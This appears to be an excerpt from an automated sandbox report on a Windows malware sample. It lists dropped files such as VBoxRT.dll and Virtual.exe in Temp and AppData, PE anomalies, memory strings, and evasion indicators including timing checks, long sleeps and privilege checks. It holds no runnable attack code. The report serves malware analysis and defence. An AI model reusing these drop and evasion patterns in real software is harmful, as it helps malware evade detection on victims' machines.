0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 
0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower_Ln
                  Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 
0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxRT\VBoxRT.pdb source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: wntdll.pdb source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: KClGcCpDAP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: KClGcCpDAP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: KClGcCpDAP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: KClGcCpDAP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: KClGcCpDAP.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_6E231400 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_6E231400
                  Source: jamulieilmfjkk.4.dr Static PE information: real checksum: 0x260d5c should be: 0x259261
                  Source: KClGcCpDAP.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x83c81b
                  Source: VBoxRT.dll.2.dr Static PE information: real checksum: 0x413417 should be: 0x40cba5
                  Source: VBoxRT.dll.1.dr Static PE information: real checksum: 0x413417 should be: 0x40cba5
                  Source: KClGcCpDAP.exe Static PE information: real checksum: 0x0 should be: 0x84fd8f
                  Source: bewwwy.18.dr Static PE information: real checksum: 0x260d5c should be: 0x259261
                  Source: Ammonium.dll.1.dr Static PE information: real checksum: 0x45d32 should be: 0x4609e
                  Source: KClGcCpDAP.exe Static PE information: section name: .wixburn
                  Source: KClGcCpDAP.exe.0.dr Static PE information: section name: .wixburn
                  Source: Ammonium.dll.1.dr Static PE information: section name: /4
                  Source: msvcr100.dll.1.dr Static PE information: section name: _CONST
                  Source: msvcr100.dll.1.dr Static PE information: section name: text
                  Source: msvcr100.dll.2.dr Static PE information: section name: _CONST
                  Source: msvcr100.dll.2.dr Static PE information: section name: text
                  Source: validPower_Lnz_x64.exe.4.dr Static PE information: section name: Shared
                  Source: jamulieilmfjkk.4.dr Static PE information: section name: .xdata
                  Source: jamulieilmfjkk.4.dr Static PE information: section name: gfcdpo
                  Source: bewwwy.18.dr Static PE information: section name: .xdata
                  Source: bewwwy.18.dr Static PE information: section name: gfcdpo
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_0089EAD6 push ecx; ret 0_2_0089EAE9
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_00D2EAD6 push ecx; ret 1_2_00D2EAE9
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Code function: 2_2_665B29CA push rcx; ret 2_2_665B29CB
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe File created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxRT.dll
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe File created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe File created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxDDU.dll
                  Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe File created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe File created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcp100.dll
                  Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\bewwwy
                  Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\jamulieilmfjkk
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe File created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dll
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe File created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dll
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe File created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dll
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe File created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcp100.dll
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe File created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxRT.dll
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe File created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe File created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcr100.dll

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JAMULIEILMFJKK
                  Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BEWWWY
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665D73C GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,2_2_6665D73C

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6CF53B54
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Code function: 2_2_6665BAC4 rdtsc 2_2_6665BAC4
                  Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bewwwy
                  Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jamulieilmfjkk
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Dropped PE file which has not been started: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dll
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Evaded block: after key decision
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Evaded block: after key decision
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Evasive API call chain: GetLocalTime,DecisionNodes
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe API coverage: 4.5 %
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe API coverage: 0.3 %
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe TID: 7148 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 5852 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 1608 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 4048 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 6024 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_008AFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 008AFF61h 0_2_008AFEC6
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_008AFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 008AFF5Ah 0_2_008AFEC6
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_00D3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00D3FF61h 1_2_00D3FEC6
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_00D3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00D3FF5Ah 1_2_00D3FEC6
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_00873CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose, 0_2_00873CC4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_008B4440 FindFirstFileW,FindClose, 0_2_008B4440
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_00889B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose, 0_2_00889B43
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_00D44440 FindFirstFileW,FindClose, 1_2_00D44440
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_00D19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose, 1_2_00D19B43
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Code function: 1_2_00D03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose, 1_2_00D03CC4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666644A8 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,SetErrorMode,2_2_666644A8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666663E4 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666663E4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666683E8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666683E8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666623A0 FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_666623A0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66665EE8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66665EE8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66663F10 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,2_2_66663F10
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66667F84 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667F84
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66662C0C FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_66662C0C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66666DDC __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66666DDC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66667B1C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667B1C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666885C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_6666885C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666668D8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666668D8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666649E4 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,2_2_666649E4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe Code function: 0_2_008B97A5 VirtualQuery,GetSystemInfo, 0_2_008B97A5
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Thread delayed: delay time: 30000
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: http://www.vmware.com/schema/ovf/1/envelope
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: uuidvbox:uuid%RTuuidovf:formathttp://www.vmware.com/specifications/vmdk.html#sparsehttp://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimizedovf:fileRefovf:diskIdovf:capacityDiskovf:hrefFilefile%RI32VMDKLogical network used by this appliance.ovf:nameExportedVirtualBoxMachinesVirtualSystemCollectionCannot export more than one virtual system with OVF 0.9, use OVF 1.0Logical networks used in the packageNetworkSectionovf:NetworkSection_TypeList of the virtual disks used in the packageDiskSectionovf:DiskSection_TypeReferencesxmlns:vboxhttp://www.virtualbox.org/ovf/machinexmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexmlns:vssdhttp://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingDataxmlns:rasdhttp://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingDataxmlns:ovfxmlnshttp://schemas.dmtf.org/ovf/envelope/1http://www.vmware.com/schema/ovf/1/envelopexml:langen-USovf:version0.92.0Envelope"
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: %s/VBoxGuestAdditions_%ls.iso
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: /additions/VBoxGuestAdditions.iso
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: using the native ring-0 loaderpLoadReq->u.In.cbStrTab == CalcArgs.cbStrings(size_t)(CreateArgs.pSym - (PSUPLDRSYM)&pLoadReq->u.In.abImage[offSymTab]) <= CalcArgs.cSymbols(size_t)(CreateArgs.psz - CreateArgs.pszBase) <= CalcArgs.cbStringsint __cdecl supLoadModule(const char *,const char *,const char *,void **)ModuleTermModuleInitVMMR0EntryExVMMR0EntryFastVMMR0EntryIntsupLoadModule returned %RrcVBoxDrvVBox Support Driver\VBoxDrv.sys\\.\VBoxDrvVBoxNetDHCP.dllVBoxNetDHCP.exevboxwebsrv.exeVBoxBFE.dllVBoxBFE.exeVBoxSDL.dllVBoxSDL.exeVirtualBox.dllVirtualBox.exeVBoxVideoRecFB.dllVBoxHeadless.dllVBoxHeadless.exeVBoxVRDP.dllVBoxAuth.dllVRDPAuth.dllVBoxC.dllVBoxSVC.exeVBoxManage.exeVBoxOGLrenderspu.dllVBoxOGLhosterrorspu.dllVBoxOGLhostcrutil.dllVBoxSharedCrOpenGL.dllVBoxHostChannel.dllVBoxGuestControlSvc.dllVBoxGuestPropSvc.dllVBoxDragAndDropSvc.dllVBoxSharedFolders.dllVBoxSharedClipboard.dllVBoxDbg3.dllVBoxDbg.dllVBoxDDU.dllVBoxDD2.dllVBoxDD.dllVBoxREM.dllVBoxVMM.dllVBoxRT.dllVBoxDD2GC.gcVBoxDDGC.gcVMMGC.gcVBoxDD2R0.r0VBoxDDR0.r0
                  Source: Virtual.exe, 00000002.00000003.1718068778.0000000001391000.00000004.00000001.00020000.00000000.sdmp, Virtual.exe, 00000002.00000000.1705595351.00007FF6C5953000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: AdditionsFacilityType_VBoxTrayClient
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: aVmNetTx
